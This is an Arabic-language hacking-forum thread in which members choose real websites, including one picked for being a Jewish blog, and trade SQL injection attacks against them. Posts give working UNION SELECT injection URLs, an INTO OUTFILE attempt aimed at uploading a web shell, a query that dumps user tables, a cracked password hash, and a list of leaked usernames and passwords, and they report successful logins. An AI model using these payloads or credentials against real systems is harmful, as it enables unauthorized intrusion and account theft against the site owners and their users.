[align=center]ههههههه
معاك حق فعلا هما يحبون الشي يجيهم جاهز وكامل...
ضع الهدف وتوكل وراح نترك الهدف لبكرا ممكن احد الاعضاء يشارك معانا ويحقنو
تحياتي^_^


[/align]

هذا هو الهدف الجديد
blog يهودي
مع العلم أنني أريد خطوات الإختراق كل أمر قمت به و العقبات التي صادفتك

Master vbspiders
صدقني ماراح يحقنو ولا واحد ولو تتركه أسبوع كامل

[align=center]ههههه فعلا والله وخصوصا هذا الموقع
لانو فيه تخمين
ننتظر لبكرا والله كريم
تحياتي[/align]

اليكم هذا الموقع
http://www.slatina-online.ro/adauga_...ue&categorie=5

جاري أخ marrak

الموقع ليس مصاب أخي
يرجى التأكد
و الله أعلم

شوف الموقع بثغرة into outfile تقدر ترفع شيل لازم مسار مصرح
http://www.talkeetnachamber.org/news...,7,8,9,10,11--
و يتيح الطباعة قمت بتكوين ملف في مجلد tmp

http://www.talkeetnachamber.org/news.php?id=158+AND+1=2+UNION+SELECT+1,2,3,'d4rk-h4ck3r',5,6,7,8,9,10,11+into+outfile"/tmp/d4rk.txt"

http://www.talkeetnachamber.org/news...,7,8,9,10,11--

لول تمت طباعة اسمي يعني يتيح الطباعة فقط ما زال معرفة مسارنا بالسيرفر اذا وجدناه اضمنلك شل مرفوع

d4rK-h4ck3r
هههههههههههههههههههههه
مازال ماوصلتش لهاذ الدرجة من الإحتراف أخي الكريم
ههههههههههههههههههههههههههههههههههههههههههههههه

اخي هذه الفائدة من المشاركات مزيد التعلم و ان شاء الله تتقن مثل هذا النوع من الثغرات كما ان الاخوة من الجزائر سريعوا التعلم و هم النخبة في الاختراق اولهم الاسطورة his0k4 و ان شاء الله تتوصل لاختراقه
العبرة في المحاولة ;)

تعم أخي العزيز
أول مرة أتعلم السيكول في 2 ساعات إخترفت موقع
ههههههههههههههههههههههه
اليوم فقط رجعت النت قوية
أرجو أن تتواصل هكذا لكي أعود إلى التعلم من جديد

ان شاء الله لما احسن و انا سارفعلك شرح عامله لاستغلال هذا النوع من الثغرات لكن اصبر علي شوي lol

Hi my brother marrak
there exist some account you can so use it
username:password
florintele:356746
giba:123
office:456
keepto.ro:12345

.
.
.

regards

تم الدعس
 

السلام عليكم
حياك الله أخي الكريم
الموقع مصاب و يكفي تغيير السكريبت.
الاستغلال الكامل
هذا أول عدس لي في المنتدى ......تحياتي

[align=center]ممممم
بالنسبة للموقع الاول : http://blog.soundcat.org/post.php?id=12
ما قدرت اخمن الجداول للاسف...
واما الموقع الثاني تبع الاخ marrak فبالبداية كان تفكيري مثل الاخ ooooo_darkman_ooooo
يعني ما في خطا اصلا والموقع مش مصاب لكن بعدها فكرت اجرب بسكربت ثاني وعلى نفس الموقع
ونجحت والاخ m0h@med وضع الاستغلال قبلي وهذا هو :

كود PHP:

---

http://www.slatina-online.ro/detalii_anunt.php?id_anunt=267&id_categ=3&id_subcateg=-22%20union%20select%201,2,concat_ws(0x3a,id,user,parola)+from+utilizatori-- 


---

وتم فك الهاش :c6efc361da2fbccf3f88936e54624bb8
والباس هو : 356746
ولوحة الدخول : http://www.slatina-online.ro/
هناك تسجيل دخول واضح بالصفحة الرئسية
تم الدخول بنجاح
بارك الله فيكم جميعا...
عمل منظم ورائع
تحياتي

[/align]